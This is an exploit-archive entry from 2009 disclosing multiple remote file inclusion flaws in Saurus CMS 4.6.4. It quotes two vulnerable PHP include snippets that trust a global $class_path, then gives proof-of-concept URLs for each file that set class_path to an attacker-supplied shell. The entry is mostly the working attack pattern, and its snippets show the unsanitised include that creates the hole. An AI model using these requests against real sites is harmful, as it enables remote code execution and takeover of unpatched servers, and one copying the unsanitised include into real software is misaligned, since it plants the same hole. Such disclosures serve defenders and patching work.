[] NeoSense

Saurus CMS 4.6.4 - Multiple Remote File Inclusions

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2009-12-18 
date_updated: 2015-07-12 
verified: 0 
codes: OSVDB-61230;OSVDB-61229 
tags: 
aliases:  
screenshot_url:  
application_url: 

##################################################################
## Exploit Title: SaurusCMS <= 4.6.4 Multiple RFI Exploit       ##
## Date: 19-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://www.saurus.info                        ##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################


~ Code [class.writeexcel_workbook.inc.php]

global $class_path;

require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";
require_once $class_path."excel/class.writeexcel_format.inc.php";
//require_once "class.writeexcel_formula.inc.php";
require_once $class_path."excel/class.writeexcel_olewriter.inc.php";


~ PoC

[SaurusCMS_path]/classes/excel/class.writeexcel_workbook.inc.php?class_path=[Shell]



~ Code [class.writeexcel_worksheet.inc.php]

global $class_path;
require_once $class_path."excel/class.writeexcel_biffwriter.inc.php";


~ PoC

[SaurusCMS_path]/classes/excel/class.writeexcel_worksheet.inc.php?class_path=[Shell]